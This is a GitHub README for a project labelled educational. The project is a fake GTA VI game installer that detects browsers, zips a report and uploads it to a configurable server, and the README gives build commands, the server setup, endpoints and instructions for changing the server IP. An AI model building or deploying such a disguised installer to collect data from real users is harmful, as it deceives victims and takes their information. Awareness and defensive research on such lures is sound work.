mrmtwoj/Browser-Profile-Spy---GTA-VI-Campaign-Installer

GitHub: mrmtwoj/Browser-Profile-Spy---GTA-VI-Campaign-Installer

该教学项目演示了恶意软件如何伪装成GTA VI游戏安装程序来收集用户浏览器配置文件数据,用于提升网络安全意识。

Stars: 0 | Forks: 0

# 🕵️ Browser Profile Spy - GTA VI 活动安装程序
GTA VI Banner ![GTA VI Banner](https://img.shields.io/badge/GTA%20VI-Installer-blue?style=for-the-badge&logo=rockstar) ![Version](https://img.shields.io/badge/version-1.0.0-green?style=for-the-badge) ![License](https://img.shields.io/badge/license-EDUCATIONAL-red?style=for-the-badge) ![Python](https://img.shields.io/badge/python-3.6+-yellow?style=for-the-badge&logo=python) ![C++](https://img.shields.io/badge/c++-windows-blue?style=for-the-badge&logo=cplusplus) ![Windows](https://img.shields.io/badge/Windows-10%2B-blue?style=for-the-badge&logo=windows) **⚠️ 仅供教育目的 - 用于安全意识和防御性研究 ⚠️**
## 📋 目录 - [简介](#-introduction) - [功能](#-features) - [工作原理](#-how-it-works) - [安装与设置](#-installation--setup) - [配置](#-configuration) - [技术细节](#-technical-details) - [VirusTotal 分析](#-virustotal-analysis) - [安全提示](#-security-notice) - [关于开发者](#-about-the-developer) - [法律免责声明](#-legal-disclaimer) ## Youtube [![Browser Profile Spy - GTA VI Campaign Installer](https://img.youtube.com/vi/weUrgPWX5Zs/0.jpg)](https://www.youtube.com/watch?v=weUrgPWX5Zs) ## 🎯 简介 **Browser Profile Spy** 是一个教育项目,旨在演示恶意软件如何伪装成游戏安装程序来收集浏览器信息。该项目的灵感来源于数字时代的“特洛伊木马”概念,使用热门游戏**侠盗猎车手 VI (GTA VI)**作为诱饵。 开发此工具的目的在于: - 🛡️ 提高人们对网络安全威胁的认识 - 🔍 演示浏览器配置文件是如何被收集的 - 🎓 提供社会工程学攻击的教育示例 - 📚 展示验证软件来源的重要性 ## ✨ 功能 | 功能 | 描述 | |---------|-------------| | 🖥️ **Windows GUI** | Games for Windows Marketplace 风格界面 | | 🌐 **网络通信** | 向指定服务器进行 HTTP 文件上传/下载 | | 📁 **浏览器检测** | 检测 Chrome、Firefox、Edge、Opera、Brave、Vivaldi | | 📦 **ZIP 压缩** | 创建浏览器数据的压缩归档文件 | | 📤 **文件上传** | 将浏览器配置文件发送到远程服务器 | | 📊 **进度跟踪** | 实时显示安装进度 | | 🎨 **现代 UI** | 专业的安装程序界面 | | 🔧 **可定制** | 轻松更改服务器 IP 和端口 | ## 🔧 工作原理 ### 架构概述 ``` ┌─────────────────────────────────────────────────────────────┐ │ GTA VI INSTALLER │ │ ┌─────────────────────────────────────────────────────┐ │ │ │ 1. User Runs Installer (Install Online GTA VI.exe) │ │ │ └──────────────────┬──────────────────────────────────┘ │ │ ▼ │ │ ┌─────────────────────────────────────────────────────┐ │ │ │ 2. Admin Check - Verifies Administrator Privileges │ │ │ └──────────────────┬──────────────────────────────────┘ │ │ ▼ │ │ ┌─────────────────────────────────────────────────────┐ │ │ │ 3. Browser Detection - Scans for Installed Browsers│ │ │ └──────────────────┬──────────────────────────────────┘ │ │ ▼ │ │ ┌─────────────────────────────────────────────────────┐ │ │ │ 4. Profile Collection - Gathers Browser Info │ │ │ │ • Browser name & version │ │ │ │ • Profile path │ │ │ │ • Profile size │ │ │ └──────────────────┬──────────────────────────────────┘ │ │ ▼ │ │ ┌─────────────────────────────────────────────────────┐ │ │ │ 5. Report Generation - Creates browser_report.txt │ │ │ └──────────────────┬──────────────────────────────────┘ │ │ ▼ │ │ ┌─────────────────────────────────────────────────────┐ │ │ │ 6. ZIP Creation - Compresses the Report │ │ │ └──────────────────┬──────────────────────────────────┘ │ │ ▼ │ │ ┌─────────────────────────────────────────────────────┐ │ │ │ 7. Upload to Server - Sends ZIP to Python Server │ │ │ └──────────────────┬──────────────────────────────────┘ │ │ ▼ │ │ ┌─────────────────────────────────────────────────────┐ │ │ │ 8. Download Test - Gets test.txt from server │ │ │ └──────────────────┬──────────────────────────────────┘ │ │ ▼ │ │ ┌─────────────────────────────────────────────────────┐ │ │ │ 9. Send Browser Data - Sends detailed browser info │ │ │ └──────────────────┬──────────────────────────────────┘ │ │ ▼ │ │ ┌─────────────────────────────────────────────────────┐ │ │ │ 10. Game Installation Simulation - Fake Progress │ │ │ └─────────────────────────────────────────────────────┘ │ └─────────────────────────────────────────────────────────────┘ ``` ## 📦 安装与设置 ### 前置条件 - 🐍 **Python 3.6+**(用于服务器) - 🖥️ **Windows OS**(用于安装程序) - 📦 **MinGW 编译器**(用于构建 EXE) ### 步骤 1:克隆仓库 ``` git clone https://github.com/mrmtwoj/Browser-Profile-Spy---GTA-VI-Campaign-Installer.git cd Browser-Profile-Spy---GTA-VI-Campaign-Installer ``` ### 步骤 2:服务器设置 安装 Python 依赖项(无需外部包!): ``` pip install -r requirements.txt ``` **requirements.txt:** ``` # GTA VI Browser Profile Server # 无需外部 dependencies # 仅使用 Python standard library # 需要 Python 3.6+ # 无需安装任何 packages ``` ### 步骤 3:启动 Python 服务器 ``` python file_server.py ``` **预期输出:** ``` ============================================================ 📦 GTA VI - BROWSER PROFILE SERVER ============================================================ 📡 Server: http://0.0.0.0:8000 (all interfaces) 🌐 Access from this machine: http://localhost:8000 🌐 Access from network: http://192.168.1.xxx:8000 📤 Upload: POST /upload (ZIP files) 📥 Download: GET /download/filename 📥 Test: GET /test.txt ============================================================ 🔄 Waiting for connections... Press Ctrl+C to stop ============================================================ ``` ### 步骤 4:运行安装程序 **选项 A:使用预构建的 EXE** ``` Install Online GTA VI.exe ``` **选项 B:从源码构建** #### 4a. 安装 MinGW - 从以下地址下载:https://www.mingw-w64.org/ - 添加到 PATH:`C:\mingw64\bin` #### 4b. 编译 C++ 代码 ``` g++ -o "Install Online GTA VI.exe" gta6_installer.cpp -mwindows -lgdi32 -luser32 -lshell32 -lwininet -lcomctl32 -lversion -static ``` #### 4c. (可选)添加图标 创建 `resource.rc`: ``` IDI_ICON1 ICON "app_icon.ico" ``` 带图标编译: ``` windres resource.rc -O coff -o resource.res g++ -o "Install Online GTA VI.exe" gta6_installer.cpp resource.res -mwindows -lgdi32 -luser32 -lshell32 -lwininet -lcomctl32 -lversion -static ``` ## ⚙️ 配置 ### 服务器配置 (`file_server.py`) 服务器在所有网络接口 (`0.0.0.0`) 的 `8000` 端口上运行: ``` server_address = ('0.0.0.0', 8000) ``` ### 安装程序配置 (`gta6_installer.cpp`) **编辑 IP 地址和端口:** ``` // Global IP configuration - Change this to your server IP const wstring SERVER_IP = L"127.0.0.1"; // ← Change this const int SERVER_PORT = 8000; // ← Change if needed ``` ## 🔬 技术细节 ### 浏览器检测逻辑 安装程序会在常见的安装路径中搜索浏览器: ``` vector browserDefs = { {L"Google Chrome", { L"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", L"C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe" }}, {L"Microsoft Edge", { L"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", L"C:\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe" }}, {L"Mozilla Firefox", { L"C:\\Program Files\\Mozilla Firefox\\firefox.exe", L"C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe" }}, {L"Opera", { L"C:\\Program Files\\Opera\\launcher.exe", L"C:\\Program Files (x86)\\Opera\\launcher.exe" }}, {L"Brave", { L"C:\\Program Files\\BraveSoftware\\Brave-Browser\\Application\\brave.exe", L"C:\\Program Files (x86)\\BraveSoftware\\Brave-Browser\\Application\\brave.exe" }}, {L"Vivaldi", { L"C:\\Program Files\\Vivaldi\\Application\\vivaldi.exe", L"C:\\Program Files (x86)\\Vivaldi\\Application\\vivaldi.exe" }}, {L"Chromium", { L"C:\\Program Files\\Chromium\\Application\\chrome.exe", L"C:\\Program Files (x86)\\Chromium\\Application\\chrome.exe" }} }; ``` ### 创建的文件结构 ``` C:\Program Files\GTA VI\ ├── installed_browsers.txt # List of detected browsers ├── browser_profiles.zip # Compressed report ├── downloaded_from_server.txt # Test file from server └── browser_report.txt # Detailed browser report (temporary) ``` ### 服务器 Endpoint | Endpoint | Method | 描述 | |----------|--------|-------------| | `/upload` | POST | 上传 ZIP 文件 | | `/download/{filename}` | GET | 下载文件 | | `/test.txt` | GET | 下载测试文件 | | `/` | POST | 发送浏览器数据 | | `/` | GET | Web 界面 | ## 🛡️ VirusTotal 分析 ### 扫描结果 **文件:** `Install Online GTA VI.exe` **SHA-256:** `d44b560fab8a93f251cf85afa2b1a911046e0a35b673c77fef60dae3d8119e71` **检出率:** `5/68` (7.3%) ### 为什么会这样 5 个杀毒软件引擎标记了此文件,原因如下: 1. **行为模式**: - 🔍 网络通信(上传/下载) - 📂 文件系统访问 - 🖥️ 进程注入模拟 2. **启发式分析**: - 🧬 代码结构类似于恶意软件模式 - 🔄 动态行为触发警报 - ⚡ 可疑的 API 调用 3. **通用特征码**: - 📝 Packer/编译器检测 - 🔧 异常的节名称 - 📦 资源操纵 ## ⚠️ 安全提示 ### 本项目是什么: - ✅ **教育工具** - 演示安全概念 - ✅ **研究材料** - 供网络安全学生使用 - ✅ **意识工具** - 展示社会工程技术 - ✅ **受控环境** - 可安全测试 ### 本项目不是什么: - ❌ **恶意软件** - 无数据窃取功能 - ❌ **病毒** - 无自我复制能力 - ❌ **间谍软件** - 无持续监控 - ❌ **商业工具** - 仅供教育使用 ### 重要说明: 1. **ZIP 中不会收集浏览器数据** - 这只是一个演示 2. **不存储任何个人信息** - 只有浏览器名称和路径 3. **所有数据都是临时的** - 文件在处理后即被删除 4. **网络通信是本地的** - 默认配置使用 localhost ## 👨‍💻 关于开发者 ### mrmtwoj.ir **专业领域:** - 🔐 网络安全研究 - 🛡️ 恶意软件分析 - 🎓 教育内容开发 - 💻 软件开发 **使命:** **联系方式:** - 🌐 网站:[mrmtwoj.ir](https://mrmtwoj.ir) - 📧 邮箱:acyber@protonmail.com ### 理念 ## 📜 法律免责声明 **重要提示 - 请仔细阅读** ``` THIS SOFTWARE IS PROVIDED FOR EDUCATIONAL PURPOSES ONLY. By using this software, you agree to: 1. Use it only in controlled, authorized environments 2. Not use it to harm or exploit others 3. Comply with all applicable laws and regulations 4. Accept full responsibility for your actions The author is NOT responsible for: - Any misuse of this software - Any damages caused by this software - Any legal consequences of using this software This software is NOT intended for: - Unauthorized access to computer systems - Theft of personal information - Any illegal activities - Commercial use without permission ``` ## 📚 其他资源 - [OWASP Top 10](https://owasp.org/www-project-top-ten/) - [MITRE ATT&CK 框架](https://attack.mitre.org/) - [网络安全教育](https://www.cisa.gov/cybersecurity) - [VirusTotal 文档](https://developers.virustotal.com/) ## 🤝 贡献 欢迎贡献!请确保: 1. 所有更改均具有教育性质 2. 未添加任何恶意功能 3. 文档已更新 4. 代码已妥善注释 ## 📝 更新日志 | 版本 | 日期 | 更改内容 | |---------|------|---------| | 1.0.0 | 2024 | 初始版本 | | 1.0.1 | 2024 | 更新了 UI 主题 | | 1.0.2 | 2024 | 添加了服务器配置 |
**[⬆ 返回顶部](#-Browser-Profile-Spy---GTA-VI-Campaign-Installer---gta-vi-campaign-installer)** **为教育目的而用 💗 制作** *"能力越大,责任越大" - Uncle Ben* **⚠️ 本项目仅供教育和研究目的使用 ⚠️**
标签:C++, DNS 反向解析, Gophish, Linux, Python, 数据展示, 数据擦除, 无后门, 知识库安全, 社会工程, 红队, 逆向工具